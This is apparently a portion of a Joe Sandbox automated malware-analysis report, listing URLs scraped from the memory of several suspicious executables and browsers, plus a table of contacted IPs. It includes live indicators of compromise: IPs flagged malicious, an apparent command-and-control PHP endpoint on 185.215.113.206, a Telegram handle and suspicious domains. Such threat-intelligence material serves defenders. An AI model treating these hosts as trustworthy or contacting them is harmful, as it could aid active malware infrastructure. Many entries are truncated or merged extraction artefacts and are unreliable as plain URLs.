http://anglebug.com/6929	chrome.exe, 00000010.00000003.3097437937.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103175400.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103002890.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	false
https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis	d1834e5726.exe, 0000000B.00000003.2697887426.0000000000AC1000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp	false
https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC	d1834e5726.exe, 0000000B.00000003.2697887426.0000000000AC1000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698103352.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	false
https://tracking-protection-issues.herokuapp.com/new	firefox.exe, 00000027.00000002.3430306724.00000269D7DC0000.00000002.08000000.00040000.00000000.sdmp	false
https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=ImL_uti9QFBw&l=e	d1834e5726.exe, 0000000B.00000003.2697887426.0000000000AC1000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.206/c4becf79229cb002.phpSQ	cd39094ad6.exe, 00000022.00000002.3390011704.000000000085D000.00000004.00000020.00020000.00000000.sdmp	false
https://anglebug.com/7246	chrome.exe, 00000010.00000003.3097437937.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103175400.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103002890.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	false
https://anglebug.com/7369	chrome.exe, 00000010.00000003.3097437937.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103175400.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103002890.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	false
https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en	d1834e5726.exe, 0000000B.00000003.2697887426.0000000000AC1000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698103352.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	false
https://anglebug.com/7489	chrome.exe, 00000010.00000003.3097437937.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103175400.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103002890.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	false
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report	firefox.exe, 00000027.00000002.3430306724.00000269D7DC0000.00000002.08000000.00040000.00000000.sdmp	false
https://drive-daily-2.corp.google.com/	chrome.exe, 00000010.00000003.3095766746.000044C000468000.00000004.00000800.00020000.00000000.sdmp	false
http://polymer.github.io/PATENTS.txt	chrome.exe, 00000010.00000003.3113410518.000044C001100000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3111024822.000044C0010D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3112059549.000044C000CC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3111314765.000044C000F78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3112153876.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3110890431.000044C001070000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3113602675.000044C00120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3111666200.000044C00109C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3112300126.000044C000FB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3112111133.000044C000EB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3113175567.000044C000474000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3110965936.000044C001080000.00000004.00000800.00020000.00000000.sdmp	false
https://issuetracker.google.com/161903006	chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	false
https://www.ecosia.org/newtab/	95bf820dd4.exe, 0000000E.00000003.3219654068.00000000036A5000.00000004.00000020.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3061961515.000000000591B000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3062107281.000000000591B000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3061855263.000000000591E000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3214434079.0000000005A78000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3215170912.0000000005A78000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3213891314.0000000005A7B000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000017.00000003.3353614651.0000000005658000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000017.00000003.3356732212.0000000005658000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000017.00000003.3351249630.000000000565B000.00000004.00000800.00020000.00000000.sdmp	false
https://lv.queniujq.cn	d1834e5726.exe, 0000000B.00000003.2698103352.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	false
https://drive-daily-5.corp.google.com/	chrome.exe, 00000010.00000003.3095766746.000044C000468000.00000004.00000800.00020000.00000000.sdmp	false
https://steamcommunity.com/osof	d1834e5726.exe, 0000000B.00000003.2698103352.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	false
https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy	chrome.exe, 00000010.00000003.3112300126.000044C000FD4000.00000004.00000800.00020000.00000000.sdmp	false
http://anglebug.com/4722	chrome.exe, 00000010.00000003.3097437937.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103175400.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103002890.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	false
https://m.google.com/devicemanagement/data/api	chrome.exe, 00000014.00000003.3131825102.000010A0001E0000.00000004.00000800.00020000.00000000.sdmp	false
https://static.adsafeprotected.com/firefox-etp-js	firefox.exe, 00000027.00000002.3437424456.00000269D8303000.00000004.00000800.00020000.00000000.sdmp	false
https://checkout.steampowered.com/	d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	false
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	ccdb824191.exe, 0000000F.00000003.3205040006.00000000059C7000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3204434338.00000000059C6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3423342277.00000269D79AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3467663342.00000269DBC6D000.00000004.00000800.00020000.00000000.sdmp	false
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477	ccdb824191.exe, 0000000F.00000003.3205040006.00000000059C7000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3204434338.00000000059C6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3423342277.00000269D79AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3467663342.00000269DBC6D000.00000004.00000800.00020000.00000000.sdmp	false
https://tacitglibbr.biz/apiograH	ccdb824191.exe, 0000000F.00000003.3272963238.000000000134C000.00000004.00000020.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3316873570.000000000134C000.00000004.00000020.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3323957054.000000000134C000.00000004.00000020.00020000.00000000.sdmp	false
https://steamcommunity.com/profiles/76561199724331900AP	d1834e5726.exe, 0000000B.00000002.2698776978.0000000000A45000.00000004.00000020.00020000.00000000.sdmp	false
https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f	firefox.exe, 00000027.00000002.3430306724.00000269D7DC0000.00000002.08000000.00040000.00000000.sdmp	false
http://html4/loose.dtd	4b8eda303b.exe, 0000000C.00000003.2728432336.0000000007E31000.00000004.00001000.00020000.00000000.sdmp, 2656cd82fe.exe, 0000000D.00000002.2880704353.0000000000F1D000.00000040.00000001.01000000.0000000B.sdmp, 2656cd82fe.exe, 0000000D.00000003.2838596176.000000000751C000.00000004.00001000.00020000.00000000.sdmp	false
http://anglebug.com/3502	chrome.exe, 00000010.00000003.3097437937.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103175400.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103002890.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	false
http://anglebug.com/3623	chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	false
http://anglebug.com/3625	chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	false
https://bugzilla.mozilla.org/show_bug.cgi?id=1584464	firefox.exe, 00000027.00000002.3437424456.00000269D8325000.00000004.00000800.00020000.00000000.sdmp	false
http://anglebug.com/3624	chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	false
https://help.steampowered.com/en/	d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp	false
https://smartblock.firefox.etp/facebook.svgwebcompat-reporter%40mozilla.org:1.5.1	firefox.exe, 00000027.00000002.3437424456.00000269D8303000.00000004.00000800.00020000.00000000.sdmp	false
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	ccdb824191.exe, 0000000F.00000003.3204434338.00000000059C6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3423342277.00000269D79AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3467663342.00000269DBC6D000.00000004.00000800.00020000.00000000.sdmp	false
http://anglebug.com/3862	chrome.exe, 00000010.00000003.3097437937.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103175400.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103002890.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	false
https://chrome.google.com/webstoreLDDiscover	chrome.exe, 00000010.00000003.3113547382.000044C000EF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3105195237.000044C000CC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3106481493.000044C000CC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103487201.000044C000CC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3109312816.000044C000EF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3106211605.000044C000EF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3112544180.000044C000CC0000.00000004.00000800.00020000.00000000.sdmp	false
http://anglebug.com/4836	chrome.exe, 00000010.00000003.3097437937.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103175400.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103002890.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	false
https://issuetracker.google.com/issues/166475273	chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	false
https://broadcast.st.dl.eccdnx.com	d1834e5726.exe, 0000000B.00000003.2698103352.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	false
https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp	false
https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/f0f51715-7f5e-48de-839	firefox.exe, 00000027.00000002.3437424456.00000269D8325000.00000004.00000800.00020000.00000000.sdmp	false
http://x1.c.lencr.org/0	ccdb824191.exe, 0000000F.00000003.3157196383.0000000005994000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3296530271.0000000005B4D000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000017.00000003.3457147283.0000000005664000.00000004.00000800.00020000.00000000.sdmp	false
http://x1.i.lencr.org/0	ccdb824191.exe, 0000000F.00000003.3157196383.0000000005994000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3296530271.0000000005B4D000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000017.00000003.3457147283.0000000005664000.00000004.00000800.00020000.00000000.sdmp	false
https://mozilla-hub.atlassian.net/browse/SDK-405	firefox.exe, 00000027.00000002.3437424456.00000269D8303000.00000004.00000800.00020000.00000000.sdmp	false
http://anglebug.com/3970	chrome.exe, 00000010.00000003.3097437937.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103175400.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103002890.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	false
https://apis.google.com	chrome.exe, 00000010.00000003.3153890473.000044C001718000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3152627843.000044C0017B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3152426467.000044C0017AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3153064493.000044C001768000.00000004.00000800.00020000.00000000.sdmp	false
https://steamcommunity.com/workshop/	d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp	false
https://support.mozilla.org/products/firefoxgro.all	ccdb824191.exe, 00000017.00000003.3462293074.000000000574A000.00000004.00000800.00020000.00000000.sdmp	false
http://polymer.github.io/CONTRIBUTORS.txt	chrome.exe, 00000010.00000003.3113410518.000044C001100000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3111024822.000044C0010D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3112059549.000044C000CC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3111314765.000044C000F78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3112153876.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3110890431.000044C001070000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3113602675.000044C00120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3111666200.000044C00109C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3112300126.000044C000FB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3112111133.000044C000EB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3113175567.000044C000474000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3110965936.000044C001080000.00000004.00000800.00020000.00000000.sdmp	false
https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c	d1834e5726.exe, 0000000B.00000003.2697887426.0000000000AC1000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp	false
https://labs.google.com/search?source=ntp	chrome.exe, 00000010.00000003.3153781356.000044C0016FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3152243921.000044C0017A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3154136056.000044C00180C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3153890473.000044C001718000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3152627843.000044C0017B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3152426467.000044C0017AC000.00000004.00000800.00020000.00000000.sdmp	false
http://.jpg	4b8eda303b.exe, 0000000C.00000003.2728432336.0000000007E31000.00000004.00001000.00020000.00000000.sdmp, 2656cd82fe.exe, 0000000D.00000002.2880704353.0000000000F1D000.00000040.00000001.01000000.0000000B.sdmp, 2656cd82fe.exe, 0000000D.00000003.2838596176.000000000751C000.00000004.00001000.00020000.00000000.sdmp	false
https://google-ohttp-relay-query.fastly-edge.com/2P	chrome.exe, 00000010.00000003.3086241229.000004900071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3086424995.0000049000728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136288557.00001BA800974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3125141088.00001BA80071C000.00000004.00000800.00020000.00000000.sdmp	false
https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en	d1834e5726.exe, 0000000B.00000003.2697887426.0000000000AC1000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698103352.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	false
https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng	d1834e5726.exe, 0000000B.00000003.2697887426.0000000000AC1000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698103352.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	false
https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings2	firefox.exe, 00000027.00000003.3374061865.00000269DF4AA000.00000004.00000800.00020000.00000000.sdmp	false
http://anglebug.com/5901	chrome.exe, 00000010.00000003.3097437937.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103175400.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103002890.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	false
http://anglebug.com/3965	chrome.exe, 00000010.00000003.3097437937.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103175400.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103002890.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	false
https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl	d1834e5726.exe, 0000000B.00000003.2697887426.0000000000AC1000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698103352.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	false
https://anglebug.com/7161	chrome.exe, 00000010.00000003.3097437937.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103175400.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103002890.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	false
https://monitor.firefox.commaybeShowOnboardingDialog	firefox.exe, 00000027.00000002.3437424456.00000269D8303000.00000004.00000800.00020000.00000000.sdmp	false
https://anglebug.com/7162	chrome.exe, 00000010.00000003.3097437937.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103175400.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103002890.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	false
http://anglebug.com/5906	chrome.exe, 00000010.00000003.3097437937.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103175400.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103002890.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	false
https://support.mozilla.orgremoveTabsProgressListenerbrowser.tabs.drawInTitlebarGeolocationPermissio	firefox.exe, 00000027.00000002.3437424456.00000269D8303000.00000004.00000800.00020000.00000000.sdmp	false
http://anglebug.com/2517	chrome.exe, 00000010.00000003.3097437937.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103175400.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103002890.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	false
http://anglebug.com/4937	chrome.exe, 00000010.00000003.3097437937.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103175400.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103002890.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	false
https://issuetracker.google.com/166809097	chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	false
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png	d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.206/c4becf79229cb002.php/#	cd39094ad6.exe, 00000015.00000002.3230900745.00000000008E7000.00000004.00000020.00020000.00000000.sdmp	false
https://lens.google.com/v3/upload	chrome.exe, 00000014.00000003.3126241125.00001BA80087C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000002.3316940891.00001BA8008D8000.00000004.00000800.00020000.00000000.sdmp	false
https://t.me/detct0r(	95bf820dd4.exe, 0000000E.00000003.2927405446.000000000079A000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.206/c4becf79229cb002.php/J	cd39094ad6.exe, 00000015.00000002.3230900745.00000000008E7000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.206/c4becf79229cb002.phpPR	cd39094ad6.exe, 00000022.00000002.3390011704.000000000085D000.00000004.00000020.00020000.00000000.sdmp	false
http://anglebug.com/3832	chrome.exe, 00000010.00000003.3097437937.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103175400.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103002890.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	false
http://185.215.113.206/c4becf79229cb002.php/P	cd39094ad6.exe, 00000022.00000002.3390011704.000000000085D000.00000004.00000020.00020000.00000000.sdmp	false
https://www.google.comAccess-Control-Allow-Credentials:	chrome.exe, 00000010.00000003.3128318055.000044C000E74000.00000004.00000800.00020000.00000000.sdmp	false

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.215.113.43	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
104.21.50.161	tacitglibbr.biz	United States	13335	CLOUDFLARENETUS	false
141.8.192.141	home.twentygr20sb.top	Russian Federation	35278	SPRINTHOSTRU	false
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
116.203.12.114	sedone.online	Germany	24940	HETZNER-ASDE	false
149.154.167.99	t.me	United Kingdom	62041	TELEGRAMRU	false
34.107.221.82	prod.detectportal.prod.cloudops.mozgcp.net	United States	15169	GOOGLEUS	false
35.244.181.201	prod.balrog.prod.cloudops.mozgcp.net	United States	15169	GOOGLEUS	false
34.226.108.155	httpbin.org	United States	14618	AMAZON-AESUS	false
34.117.188.166	contile.services.mozilla.com	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
185.215.113.206	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
172.217.21.36	www.google.com	United States	15169	GOOGLEUS	false
35.190.72.216	prod.classify-client.prod.webservices.mozgcp.net	United States	15169	GOOGLEUS	false
142.250.181.78	youtube.com	United States	15169	GOOGLEUS	false
34.160.144.191	prod.content-signature-chains.prod.webservices.mozgcp.net	United States	2686	ATGS-MMD-ASUS	false
23.37.186.133	steamcommunity.com	United States	16625	AKAMAI-ASUS	false
31.41.244.11	unknown	Russian Federation	61974	AEROEXPRESS-ASRU	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1575889
Start date and time:	2024-12-16 11:01:24 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 20m 33s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
